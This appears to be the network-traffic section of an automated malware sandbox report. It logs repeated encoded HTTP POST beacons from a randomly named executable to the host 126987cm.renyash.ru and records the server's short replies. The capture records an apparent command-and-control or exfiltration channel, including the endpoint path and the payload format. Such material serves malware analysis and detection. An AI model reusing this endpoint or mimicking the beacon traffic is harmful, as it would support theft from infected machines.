                                                                                                                                Data Ascii: TR^TSD\U]V[WT[Q]XWXZ[WWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!371=!=']$=#6+B#V!#0#2=6">- &*!^&%X*
                                                                                                                                Jan 1, 2025 21:47:55.165779114 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:55.432388067 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dnD0%2BC0XNvMurUHd8RkxZSpTS5X4sgOOpOLUKAImv18ldvctGKIWlru0RcQeGOYMput5yDZ%2BWtRxwGUtVDB6fg6VpijmUMsfX%2F65YkLSf0jjPlrbXYuMTa1CShEglXGa1gyv5no"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e017d4ac346-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7612&min_rtt=1752&rtt_var=12377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=30020&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.449786172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:55.621249914 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:55.967976093 CET1072OUTData Raw: 51 52 5b 50 53 41 59 51 5d 56 5b 57 54 5a 51 5f 58 57 58 5d 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR[PSAYQ]V[WTZQ_XWX][VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!07"]5?%.0X!'U(7U5'3)5*+$[2:!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:56.090771914 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:56.268455029 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CoFnNYd4SR3o6t9QPOEZYj0Ip98ixF6KdWorJNyjf0fesx1g3pgahqIsXX7T9j%2B8rH7Ms%2Fud3c1ChfaQpG34FXnoT3jXa2MpJbBBdiYNzat1dgpdY9rvDjN7%2F5ChGll%2BEYh0hP8b"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0738bf4235-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7297&min_rtt=1582&rtt_var=12024&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=30863&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.449792172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:56.391701937 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:56.749160051 CET1072OUTData Raw: 54 54 5b 52 56 4b 5c 51 5d 56 5b 57 54 55 51 5a 58 54 58 5b 5b 5f 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[RVK\Q]V[WTUQZXTX[[_WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^'2+_4""='0=(^6#(3T!64'2=5D(Y&*!^&%X*


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                40192.168.2.449798172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:56.787184000 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:57.139745951 CET1764OUTData Raw: 54 5e 5b 5e 56 45 59 55 5d 56 5b 57 54 5b 51 5d 58 53 58 51 5b 54 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[^VEYU]V[WT[Q]XSXQ[TWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'?X#!%Y68$#6?T*'865$R$0*5!>-?%!^&%X*
                                                                                                                                Jan 1, 2025 21:47:57.235243082 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:57.512482882 CET953INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOvVWdbWH6npDwZCLB0JvplyT449ROKwRtVtddDTPCN3oitAmB7SgnFlFoixoHA51%2B8dptYaQw6m%2FqAdgaCJ5JV%2B8fJt2vgqNECMaNwt4YQ3SkrLpMelwF4SSobNuaQbarYKlrcg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0e69b17291-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4534&min_rtt=1883&rtt_var=6009&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=63211&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0e 3f 26 23 57 34 22 0b 55 28 2b 33 1c 24 31 3d 05 31 0d 35 41 2b 06 02 00 3f 3c 38 16 26 12 27 05 27 29 2a 0f 2b 32 38 11 29 0c 20 5c 05 1b 39 17 24 5f 30 01 24 2b 29 1d 29 09 34 5d 20 2f 22 5a 28 20 2c 50 37 5e 22 01 25 2b 3a 0c 30 5c 22 55 2b 2c 20 07 28 33 24 0f 26 3d 2a 51 0f 16 3b 0d 3d 33 2e 5a 2a 2c 24 11 27 32 34 58 22 35 3d 50 24 28 2b 56 27 5c 3d 02 2b 10 3f 14 21 30 3f 1f 31 2c 25 07 26 2e 0e 0d 2d 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"?&#W4"U(+3$1=15A+?<8&'')*+28) \9$_0$+))4] /"Z( ,P7^"%+:0\"U+, (3$&=*Q;=3.Z*,$'24X"5=P$(+V'\=+?!0?1,%&.-:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                41192.168.2.449799172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:56.969068050 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:57.327347994 CET1064OUTData Raw: 54 54 5b 54 56 40 5c 56 5d 56 5b 57 54 5c 51 5f 58 57 58 5a 5b 56 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[TV@\V]V[WT\Q_XWXZ[VWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$Z "(%>'#;'T+7#T66'0.*%=>>;%:!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:57.412930012 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:57.671359062 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4TDNc1dbza%2Bx5JTpy7TcS%2FrX5svMRTJNcOu2rRwj3l2ZJgLDQ15Xeqn5vdH1kMsoxfOSKWRMpKwvGzfd6qwKt9xgbM3aPuuRietVIi5yVeb3W4g%2FnLRTuvkyyI%2FzkgNaEvbJD4nW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0f8e05f791-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=1683&rtt_var=2205&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=182957&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                42192.168.2.449805172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:57.796283007 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:58.179810047 CET1064OUTData Raw: 54 56 5b 54 53 43 5c 53 5d 56 5b 57 54 5c 51 5a 58 5d 58 5c 5b 52 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSC\S]V[WT\QZX]X\[RWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3[7"!<$.46;?$+!8T$2*)C+0&*!^&%X*#
                                                                                                                                Jan 1, 2025 21:47:58.240447044 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:58.542028904 CET812INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0C%2B2HdV1IDxRUpw7KP1Rkvmbrs1R%2FKD2rX0WqUNUL6GLKtYRLPOLbim%2BD83fh%2FPipluA4a8nkOpgl3D5MFUo%2BuZ%2FhNV2Vkjqvg7ugc9n2XDyr21pUPr2DcEgH5NgxOJ7Tiu1rP%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e14b968436a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3462&min_rtt=1539&rtt_var=4424&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1385&delivery_rate=86252&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                43192.168.2.449811172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:58.674599886 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:59.030354023 CET1072OUTData Raw: 54 50 5b 51 56 40 59 56 5d 56 5b 57 54 5a 51 52 58 5c 58 50 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP[QV@YV]V[WTZQRX\XP[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$"$ !! >;[3=" <'W!%(':=%*+ %!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:59.128249884 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:59.405613899 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4fZhRC%2FbPab1UYUqJnHnJTe%2FsS%2Fuy4MuXFX4kpzRzpRMCkg5mUwJwnR6yuenlMhw8rl0a4IYY%2BTKsYWxzw%2B0aGGIo4Cx0hpDPYB3Fb%2BJne8KUfXaejpsKg6jX6bPO0qLfNGqssX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e1a3b2117ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4187&min_rtt=1663&rtt_var=5673&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=66782&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                44192.168.2.449817172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:59.529432058 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:59.874808073 CET1072OUTData Raw: 54 54 5b 5f 53 41 5c 52 5d 56 5b 57 54 59 51 5c 58 50 58 50 5b 51 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_SA\R]V[WTYQ\XPXP[QWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z&1 42Z5.('75]'R*4?5'(&=<.('*!^&%X*3
                                                                                                                                Jan 1, 2025 21:47:59.972004890 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:00.228523970 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FO77fqMtYe54Lm1CV0%2BMVxhqMBw67vZbX3I72rf9wC91AeKiasszZOBf3piw5pOJ3k90vLEybY4RUnoXu0jk%2B2xTBu85UoZ1eO0lZOENlGyGOfI0bbgW04slGuuZUgxcuvs41T52"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e1f8ff2f795-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3918&min_rtt=1649&rtt_var=5157&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=73715&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                45192.168.2.449823172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:00.359385014 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:00.717972994 CET1072OUTData Raw: 54 52 5b 5f 56 4a 59 5f 5d 56 5b 57 54 5f 51 59 58 55 58 59 5b 57 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[_VJY_]V[WT_QYXUXY[WWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z02_""=Z"$%-4" <(#%'#1)56?4&!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:00.831280947 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:01.096565008 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQqvuqi7pYaTk0lJrEdux8PLj2yjl8MupbS%2BhHSvThohXCmTNDkFMgJ8hArVqXr%2BGJ51XAbJ%2FNwyrR1YfAZkh%2BGymsafszuU%2BMJGnx5Kul2Zrdd5SvMDp9pmIac76bI9r3S98chw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e24daab15c7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4680&min_rtt=1682&rtt_var=6628&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=56871&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                46192.168.2.449832172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:01.457510948 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:01.832698107 CET1072OUTData Raw: 51 56 5b 53 56 44 59 55 5d 56 5b 57 54 58 51 52 58 51 58 5d 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[SVDYU]V[WTXQRXQX][^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z$Y !]"0=$["8((B8!5 S0(6<.(1!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:01.895823956 CET25INHTTP/1.1 100 Continue
